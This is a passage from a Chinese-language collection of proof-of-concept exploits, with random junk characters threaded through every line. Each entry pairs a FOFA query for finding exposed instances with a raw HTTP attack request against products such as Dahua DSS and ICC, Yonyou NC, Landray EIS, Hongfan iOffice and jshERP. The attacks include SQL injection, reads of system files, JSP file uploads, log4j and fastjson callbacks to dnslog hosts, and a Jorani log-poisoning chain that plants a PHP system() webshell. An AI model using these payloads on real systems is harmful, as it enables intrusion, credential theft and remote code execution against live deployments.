, _5 L5 k# B1 R0 r# f/ v" Q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
5 p5 N' j3 M0 G' `  J5 YFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
2 D; x" Y$ E0 ^GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1( s4 d2 a; K: g3 s
Host: 127.0.0.10 H: I) s/ K; g1 h" o0 H
Pragma: no-cache
) x4 t, l9 Y( Z  cCache-Control: no-cache
  [. I! }  V- D9 _Upgrade-Insecure-Requests: 1
6 k) i2 }1 I& G% K3 E" e0 y' _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. F) l) g+ W9 `" W5 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; p" c- K6 L$ w# x( e, ~% D
Accept-Encoding: gzip, deflate* m; }$ c2 i/ r8 S) ?
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% t5 q$ g) _4 Z: D) I0 r: g( sConnection: close
( D0 l* {$ d2 x1 f: l. L; ?8 B4 N) z2 L+ G. D9 n& R' r; g
4 B- \* f- `5 l. o) C6 e9 i. }
12. Jorani < 1.0.2 远程命令执行
% X6 v' |0 w4 ?7 T% s' GFOFA:title="Jorani"2 v* j$ d$ _7 h5 D; b
第一步先拿到cookie
" \9 C4 t. O6 ^& JGET /session/login HTTP/1.1
& t/ Z7 ]1 z- nHost: 192.168.190.30! U/ [% f( C, \4 b. R# j# D4 B' h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 u; U) M( G# L. v5 }  L6 ?' W
Connection: close0 a6 s- m* x( r/ {0 t
Accept-Encoding: gzip  `7 T. B$ ~/ j' N) R

0 B0 T0 [( Q$ x. h# o. T. X. X- D, D# G7 c$ L% _* _
响应中csrf_cookie_jorani用于后续请求
: G" g7 _5 I/ B; c( Y- ~. lHTTP/1.1 200 OK
. P: `" J% n: n' [0 QConnection: close
9 ]) [- |5 H* O+ p' [8 g+ VCache-Control: no-store, no-cache, must-revalidate8 @* I0 g! o+ W* b0 _$ p1 F
Content-Type: text/html; charset=UTF-8
0 s4 r4 A2 d! a$ b! |6 \* MDate: Tue, 24 Oct 2023 09:34:28 GMT
0 p' w* b& }  h1 s7 eExpires: Thu, 19 Nov 1981 08:52:00 GMT2 U: K( b$ M9 B% ^; |* U. X
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
& y3 v7 p( ^) Z0 m+ e- tPragma: no-cache/ j; ?4 \$ U. ?" t% E1 }
Server: Apache/2.4.54 (Debian)+ R/ [" L) v8 p7 Z# l+ n5 m' g0 v5 Z
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
# g0 `: ^1 ]5 }6 y. i" LSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly- U- c5 }8 Z# q9 G
Vary: Accept-Encoding* \* D4 u$ B; v; A" [

( c+ F$ i+ r( Q* P$ [$ y* f
& q+ m; R1 q9 O/ t& I: p3 aPOST请求,执行函数并进行base64编码7 ^2 L4 F8 q, d  t' v6 ~9 A
POST /session/login HTTP/1.1
6 s# V7 c  |: C7 HHost: 192.168.190.30
% c* o4 h3 p& B% u1 X6 ^8 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* B! }2 ]3 {9 i& [2 iConnection: close
9 q+ M$ E% \. c* i0 zContent-Length: 252% _$ V% Q2 W( k) C  C
Content-Type: application/x-www-form-urlencoded
/ H. g/ F$ N, C. h1 TCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r5 ~; d- K7 N; X5 m+ J& \* [8 Q
Accept-Encoding: gzip6 F0 Y2 x4 o+ U' Z# R& E
4 |1 A' `9 J( g% L* O- R. }
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor. b/ {- q/ H0 T. ]1 l  n# _

' I! N, i2 b- a7 X) p! I) }% _, H) Y. x% G; G0 A' N& e1 m- ~

) i$ ^5 f6 j' @, n' B( W& M! P向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串" A$ M: e; n  [5 n/ E
GET /pages/view/log-2023-10-24 HTTP/1.12 F; r: s9 s- m$ p
Host: 192.168.190.30' S: F7 U& W: s% T8 x/ v+ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- j/ k4 W9 p3 vConnection: close
0 J1 ?1 L$ W# X0 i! T, ]Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
, d& {4 |, _8 d! MK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
. j  {  D$ i: n3 ?, VX-REQUESTED-WITH: XMLHttpRequest
8 J+ K0 G3 h/ S8 H0 C  T) IAccept-Encoding: gzip
' x$ U/ u" q! ~( p' [# O" \0 v3 t1 f3 O2 j3 ~: B6 v
$ Q+ S* I0 ~9 ?  w- F0 n
13. 红帆iOffice ioFileDown任意文件读取
4 H$ U: }! S# s8 F3 Y. }FOFA:app="红帆-ioffice"
! O, v/ c0 l3 W! _GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
2 P' w* Q( [1 J( f. cHost: x.x.x.x9 @1 r9 z* _# M& ?! B/ y8 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. I" }, g  j" w8 h3 E  T1 RConnection: close
# z; I6 f9 F& VAccept: */*  l, J) P; q) K7 F1 v
Accept-Encoding: gzip: l  D# g2 v6 v" A/ Q

- B: Y1 b/ @) b$ n
2 O/ u3 I* e% Y5 i+ ?2 L" L' R14. 华夏ERP(jshERP)敏感信息泄露) Y8 c$ D6 O# R3 R
FOFA:body="jshERP-boot"1 _8 z4 ^" G9 F
泄露内容包括用户名密码
, T2 J- P* \% C" U" u9 B) VGET /jshERP-boot/user/getAllList;.ico HTTP/1.18 l5 R! x6 f7 Q6 M6 M
Host: x.x.x.x+ _4 B" ^$ I. `: m3 r/ p; n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 t, T2 z& n: y- }# q% g3 YConnection: close
/ d: O1 Y" Y% a" `$ pAccept: */*
+ ~* ^* e. R& dAccept-Language: en
5 h6 i. C: X6 P. ]' Q+ gAccept-Encoding: gzip
6 ]% u  E1 F5 `- \' W" M
( A) M) e- a' v. |# |
! K& i3 x' |4 f- d7 m, m8 S2 u: t15. 华夏ERP getAllList信息泄露
0 C1 ]$ ]! ]/ z0 ^# KCVE-2024-0490
6 u1 X9 Z  b2 V1 ^FOFA:body="jshERP-boot"
0 \( u- R' J( O! F泄露内容包括用户名密码
" M, y) M+ O! H+ {- sGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1: D9 }- Y) l9 s* D' X2 t. \8 i5 Y
Host: 192.168.40.130:100
8 u. H3 I$ f$ y/ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
* C7 M. w* ~  E0 x4 @& d/ A3 AConnection: close" X0 {! B# ?+ U6 N$ y" T
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* @, R5 U1 F, A
Accept-Language: en8 p, {9 o* J) Z. J3 x
sec-ch-ua-platform: Windows
% J/ {( Z# L! d% s4 F* n8 P7 q) }Accept-Encoding: gzip3 n( R& B# C9 j' h

6 n- C* [. k$ `5 y9 F1 s( t' Z, L: R) n0 G2 p, h/ n$ {5 _9 ]- ^  @
16.  红帆HFOffice医微云SQL注入5 _3 h& k$ e" ^9 S( `" X
FOFA:title="HFOffice"
  [! n( [$ J" t  z2 d4 Ppoc中调用函数计算1234的md5值
* W( [9 \0 w( d" _+ fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1  {2 j* J* [( `+ r4 F$ B0 F
Host: x.x.x.x0 @# ]8 a# l9 i/ H
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, z- a0 L, ]  L( yConnection: close
- V8 _+ _% B+ X. r0 m2 n0 S+ cAccept: */*
/ R9 }' o0 @& p# r: M( MAccept-Language: en
9 H' O! G" A, k" {4 Q( EAccept-Encoding: gzip, g/ o; N+ ]6 i7 a

% D$ m& S. C  |6 Y6 r5 x
+ Q9 B8 X: Y: R6 U* T- ^) L17. 大华 DSS itcBulletin SQL 注入5 X* v+ |4 Q. U  f
FOFA:app="dahua-DSS"6 g; V% Z/ p# M* U
POST /portal/services/itcBulletin?wsdl HTTP/1.1; z7 y  i0 R+ i6 |! }- x  D
Host: x.x.x.x4 i) D! m2 q2 `! D) J' ?# }  `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ \# N+ Q1 d! X9 _% t( |, r
Connection: close
7 o% X7 H. K  x: nContent-Length: 345
$ |$ S$ X# r% b; `7 M- [' HAccept-Encoding: gzip8 W/ H; K; x1 R% N) x* U' u3 r

* b! @" ]* K0 N( C8 f<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>3 q1 F8 ^+ c3 x
<s11:Body>
: [* S' p$ j3 d* C1 t9 g* s! o    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
7 p; w' d, m/ T  X# g: K      <netMarkings>
4 D1 M4 u% g6 J4 D0 ^1 c6 |       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=11 ]+ c* I6 e9 I
      </netMarkings>
# n0 y9 L% k* p, K5 E% _    </ns1:deleteBulletin>& F  O. ]' {7 q2 P8 T
  </s11:Body>
: o! ?- `3 f' C8 ~4 L+ h  L+ @</s11:Envelope>
" d( \; C6 A5 |& T  i
' `9 c; ~* y5 @* u; y( h: b0 I; e& d% l- m8 c& z! k$ d' }1 ^
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* }& T- e6 o1 e# {7 W/ ~: j
FOFA:app="dahua-DSS"
) c. \  A& y# `) D4 ^GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
9 [* O, w+ B0 }! q  L% M$ M* e6 AHost: your-ip/ \, d) n  {  O, `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- P9 o. ]6 [! }$ d1 \, h
Accept-Encoding: gzip, deflate% g) M8 S9 j) r3 l& ]8 ]  V
Accept: */*+ L  v6 R6 Z5 D) ?: ^* x" a
Connection: keep-alive; G6 o9 B4 [; a- j& ]6 v9 w# |

7 L: U* ~/ i% S% V7 l3 n& g5 ?3 b# ~% m* d" m& L

' y5 @- c9 d! B) {, A8 X1 N( _$ x( o& [19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 i* z9 J7 f+ C0 Z% U- i' U
FOFA:app="dahua-DSS"4 g6 S' T5 i, q: _1 M3 m
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1! r: C' y& L& `8 W( D3 d# t
Host:
' Z  C* t7 r8 g2 y: iUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 |( ^* `5 r2 ~, GAccept-Encoding: gzip, deflate
! _# U8 j- {) y* E+ @5 lAccept: */*
5 L' Q* a8 x7 z* d! gConnection: keep-alive8 Q, Y4 |3 S9 E$ y4 A, y7 K0 X/ h0 c

* Y- _5 v6 E6 o' }1 Q! }: s
1 P0 j( ~. i4 A20. 大华ICC智能物联综合管理平台任意文件读取8 x* S7 k" q5 b% J/ K( S
FOFA:body="*客户端会小于800*"
. X9 K, y* Y+ v) R9 GGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.12 |  y5 x0 p  z
Host: x.x.x.x- w; n# X: b$ _6 t
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) u. r4 o" P: v3 x3 E* u) FConnection: close4 K! D$ ]& ~: m  D8 ^0 n$ }3 b
Accept: */*% S3 R4 ~/ |: @! b
Accept-Language: en2 h3 S" |/ U, S% ^7 V) E
Accept-Encoding: gzip& b, a" Q5 m, H0 G. V# V" e1 a

8 y. \) B0 O% M2 ~6 u8 L
# v* S) T- r: A6 W7 ?, v21. 大华ICC智能物联综合管理平台random远程代码执行
. a! b0 u+ y) z& q! S: q) [FOFA:icon_hash="-1935899595"
0 A0 O# e7 |0 I  H3 C! V3 r) g( TPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 y- k4 r9 m! t+ }) z8 w6 I, p( L
Host: x.x.x.x
9 F( [* O" C" m6 j2 |. A: WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! L! r4 d; G1 v( jContent-Length: 161
' P4 Z- e) E+ X8 L; }/ {; x' y7 pAccept-Encoding: gzip. \2 a! H& j' M
Connection: close
5 _9 s7 x, G' b$ x4 zContent-Type: application/json;charset=utf-8
6 p+ a' g# o, h- {7 E2 C; P
. F* J# {. P. L/ K% u2 \% o$ e2 R{
' Z# x4 d* S- V8 K4 Z+ H4 K1 S"a":{. Z  _2 F2 F) t  Z
   "@type":"com.alibaba.fastjson.JSONObject",5 d8 M( D4 Q8 j9 q& A( Q, H* ?$ I% v
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}  E$ V) v$ P: I6 W" F  ~0 g: A9 @
  }""
; n2 T8 `0 Z, D- @}- d4 W# i+ B( L+ r' o' z9 G

% ]. L& x, c( ]( L; g7 B) k
. H, r- Q& A3 }! U. V22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 D$ o/ N* r; L# I# l7 p5 OFOFA:icon_hash="-1935899595"  T5 L* k! I9 @2 p3 n
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 M- F9 y, Y9 B, g! bHost: your-ip- j, L3 B) m- c: y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 B; d' ~/ A2 z* R) I, uContent-Type: application/json;charset=utf-8! G2 L* V- L, {. o( @; J
3 B" G# d; k# J8 ]! p
{
2 |: e- S" f& a! o0 u3 ^"loginName":"${jndi:ldap://dnslog}"
% e6 c; g( V* O$ S}
1 W, Z. P' `7 k9 X* L8 T; ]8 ~$ H0 \' q  v# ?1 t

9 S  j. N/ w7 s1 E
. @* ^. n% t5 k% Y( r" N& p23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 Z( L) Z+ v9 TFOFA:icon_hash="-1935899595"
0 T" p) S& R) L! uPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
& U( a5 j  n* G: fHost: your-ip
+ [$ d6 ~3 n) `2 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) k1 A& z9 Z1 x% n8 Z) Q( hContent-Type: application/json;charset=utf-8. u( y+ Z* L% |4 u
Accept-Encoding: gzip
" Q- G6 B. Z. K0 z4 U# u& Z/ OConnection: close8 T( m' k* P+ N: Z$ l: P9 C
$ f2 L* w. z) f
{
9 |5 Z0 p0 @# |; h8 @    "a":{! R$ X7 s' ]  d; ]' x
        "@type":"com.alibaba.fastjson.JSONObject",
# b4 M3 c$ }' v& K$ m       {"@type":"java.net.URL","val":"http://DNSLOG"}) E  `; X9 c  ~- b( Z* Z
        }""
; B9 z1 Z  b* w7 b}. P4 L# n: B4 T" P( Q8 T
7 s3 z+ m. b8 `' w4 _& l, F3 Q2 P
6 S* j+ ~6 w4 T
24. 用友NC 6.5 accept.jsp任意文件上传1 [/ E$ V( S# B$ G; ^
FOFA:icon_hash="1085941792"
6 ]! T) u7 N! V: T$ KPOST /aim/equipmap/accept.jsp HTTP/1.1
- |! X2 L% h$ xHost: x.x.x.x$ Z- \. e  Z" C; k0 u
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
7 c( P* j. A6 Y' S/ lConnection: close
; v2 D4 ~7 a' o5 kContent-Length: 4494 o3 M# _2 P- u) Y; E1 R9 w8 F
Accept: */*
- J. i5 h$ `6 y1 Y! s6 ~8 PAccept-Encoding: gzip
9 Q3 d7 b+ J- W% I7 A! HContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, G0 i  k; V+ g7 D4 l0 F
, `! Y' a! @) l6 ]3 _
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 ^" M6 C8 }3 S: h  e& \: b2 V1 O
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"2 J& P* n; V. v
Content-Type: text/plain
( I) _( j4 F( H- L- R  X6 Q* _/ R; Y6 \3 n* g8 G, s& H/ R7 @% A
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>9 ]" E% \4 v1 g9 o% V3 {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% y5 _3 U$ ]+ x1 S# \3 ~
Content-Disposition: form-data; name="fname", z2 f6 g% Y5 `6 d+ z  [

/ f- b% Y: q! n3 s8 J\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp- F* f/ W) T  N# C& Y$ A: }/ F
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--" H! x- u$ W: A! I5 `" M" N6 [
) t: h2 E, I& [2 V3 s
+ s" r3 W: _) A; d- v8 y
25. 用友NC registerServlet JNDI 远程代码执行: D2 h/ J  w# H  c
FOFA:app="用友-UFIDA-NC"
+ N7 Z1 {& w8 d1 \POST /portal/registerServlet HTTP/1.1) p4 ^) E  o" Q! d- s0 y9 h" u
Host: your-ip7 q. x! G  s8 H9 V: ?9 F9 [  R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
! s  K# e- U- |& w) ^* b+ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.92 g! O4 {/ C( H; W6 Z/ A8 a4 y9 U' _
Accept-Encoding: gzip, deflate+ K" t7 _0 d/ G$ }# W2 D* ^
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- ^9 p0 D- _% a8 G7 V% JContent-Type: application/x-www-form-urlencoded
+ \7 a$ L/ g, H6 r: F% ]# Z( B/ y2 e! a
type=1&dsname=ldap://dnslog& x& Q9 [- |; D* D8 z# Y
4 x8 M5 r% n+ G# O+ u; s

2 p" o( e8 C& A; y
4 Q$ i) x! Y, e+ R1 }26. 用友NC linkVoucher SQL注入, t* z' y. c1 X2 b
FOFA:app="用友-UFIDA-NC"
. {' K7 \! ?* C, LGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1; M6 G$ F' g/ D& R% q
Host: your-ip( {. T( F( I6 a$ a( N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ `. A  M! e" j5 ^5 tContent-Type: application/x-www-form-urlencoded1 ]! x% _2 H$ Y; Y2 m$ Z" P, Q0 A
Accept-Encoding: gzip, deflate- e& v6 M/ ~/ _6 a; U. Q
Accept: */*
: _: C( A( ^. E! oConnection: keep-alive0 P: a$ I2 S0 V) k8 M' x
. i3 R- m& p2 q* b" ]

2 S( o4 a# ?6 z; m% o27. 用友 NC showcontent SQL注入
" D1 m2 d3 F7 E0 R- P: x1 J# GFOFA:icon_hash="1085941792"
4 M5 a' `) r/ c, _( r+ I1 CGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 b+ B0 Q- ~+ N
Host: your-ip
4 u5 v( y" y" o: oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. C1 `: S) R: d0 ~' C, ^; t8 v! r
Accept-Encoding: identity
8 S3 _6 p! T; J3 R5 s0 TConnection: close
: R4 }1 k( \: q$ o) X) I9 qContent-Type: text/xml; charset=utf-8
: f  j% l. J4 c3 I7 E* P9 j, J3 D% X7 h0 p8 }$ e
& u7 y$ k# d& |' V
28. 用友NC grouptemplet 任意文件上传% o% h. H( j4 b& U! q$ b: N: X% A
FOFA:icon_hash="1085941792"
% }6 F* `0 s: p2 ~1 dPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1  n/ c# R# E% ]; o4 {
Host: x.x.x.x
5 g; {& Y2 |6 k; k# ^, Y& K; XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
% r- w  |* c$ `, H5 UConnection: close
8 [: }4 `+ D# ~0 T4 |Content-Length: 268: T* F/ d4 d* r* o! P/ Z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 Z/ L% y3 }8 eAccept-Encoding: gzip( X, e  m- p5 Z1 P1 J

" m* K% e0 H( Z5 S7 j% A" y+ M8 g* B------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
# C& i! P/ G$ MContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 S3 q8 F& i! W' Q8 X0 u
Content-Type: application/octet-stream' p7 U3 l3 @6 t9 \9 |  I: ]$ K4 V7 }7 T
) ?) q/ W- F; h. _  |: k
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%># E' @' j  M- |$ I0 l
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--1 O- X1 n0 [/ u6 x
2 f7 i) ?; z- b6 g7 U
4 M; B, I5 n$ \3 }
/uapim/static/pages/nc/head.jsp
1 h7 ?3 [) K% }3 a3 S  I% P
$ w( s! K6 f6 |; X& @1 A* `5 D29. 用友NC down/bill SQL注入
  n0 G  }$ M6 X* t2 ^9 U" XFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ c4 }- }: A/ z5 H& b# |4 xGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
8 w  N% t) @/ eHost: your-ip8 q7 K2 ?" _, T- }3 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% K1 |$ `3 E) _; u, p  i$ I
Content-Type: application/x-www-form-urlencoded' t" u: b4 _+ E
Accept-Encoding: gzip, deflate
0 z/ R! g2 R1 CAccept: */*
. t7 }4 w* L+ p, d: N! x, \6 kConnection: keep-alive
' i6 t% y5 y7 B) K0 l/ o0 O+ Q6 Q, E  L6 p2 w% [1 U/ b
4 a5 X' \: l; u, F' n
30. 用友NC importPml SQL注入
6 K* ~. Z- |8 A& n6 {8 J( EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ q7 R% s% b! d& |
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
* o; D, B4 ~* U. ~, _Host: your-ip/ w) x2 A4 \1 y8 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
  _$ {- @& D  c% U7 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 m) e  e5 _0 b" g$ }: `Connection: close  A. m, N3 a8 p6 H0 ^( P& T

& \6 f" m% Q$ `) F3 p( \8 ]------WebKitFormBoundaryH970hbttBhoCyj9V2 U( s+ w% B) n/ M
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"8 u: e$ Z- [; Z- V3 S- t2 x
Content-Type: image/jpeg7 K+ M( h7 `/ |7 `0 M
------WebKitFormBoundaryH970hbttBhoCyj9V--$ }; H) c* K5 B0 C2 P

9 {$ E4 p3 v) Y- }' b8 q# U
% P5 Q) u! `1 B2 c) H  ~1 Q* R31. 用友NC runStateServlet SQL注入' @$ P. n+ G# y' e1 G+ v+ Z
version<=6.5
% [. x/ f0 _1 U* \/ S* ?' X2 o" EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 i5 _: x& k5 e* d
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 P- V8 M' `& k+ i2 _" LHost: host6 v! w* H& H! B. H, p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* U  \9 Y3 r2 I
Content-Type: application/x-www-form-urlencoded
( M! _1 S" @) k7 Z6 d5 _
5 t* i* t) w" {3 ~4 F8 r- d: z; f! {; C0 @
32. 用友NC complainbilldetail SQL注入& Y8 G% ]: j) x3 \* v' y
version= NC633、NC65. T! V7 j+ P! @  l0 W! j0 |- v
FOFA:app="用友-UFIDA-NC"; ~+ c% _) v2 c# u3 e) M. l4 |$ Q2 x+ Z- g
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1' ~; u) c+ y7 C5 }% B+ S7 P, ]% Q7 J
Host: your-ip
) y+ F# D7 s. g: G) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 Z$ v% ?* J3 Q- u: R, ?
Content-Type: application/x-www-form-urlencoded
3 J- m& r0 x2 y) V6 G0 u3 P% OAccept-Encoding: gzip, deflate4 v+ c6 a" a/ {" }& @: X
Accept: */*) [+ c; J' F" Q( X  Q) B$ \* ?
Connection: keep-alive
/ o7 H1 {  c, ^7 C& @/ ^) N- }) F. F# j) R/ @8 m

0 B6 _$ g" F. V0 r7 {, O33. 用友NC downTax/download SQL注入7 ~, z; ~0 m$ P1 a& A4 ^
version:NC6.5FOFA:app="用友-UFIDA-NC"
5 `( T% I9 T9 ^7 u5 VGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ F( X" e# t( L$ B( v; E+ D$ MHost: your-ip
0 ]( Z. u# h2 T* h9 E% QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. v- R* t( t$ G) w: d2 X
Content-Type: application/x-www-form-urlencoded
- h) q% @( a% g# [5 C0 W" `Accept-Encoding: gzip, deflate- z4 a- I+ C+ r2 H- i, y2 c# l
Accept: */*
# G+ s, E/ u7 l5 VConnection: keep-alive0 Y9 Y0 @0 a% m0 r/ y, u

. c" `3 `; l# W* o* [" W) L" q% I. l2 t% ^6 g
34. 用友NC warningDetailInfo接口SQL注入
+ F' w: i! w9 ?# w9 ^FOFA:app="用友-UFIDA-NC". C, M' _; b1 _1 L! J1 N
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# H5 b2 O6 U0 z- ?% `Host: your-ip3 @4 J6 s- Q/ O0 u
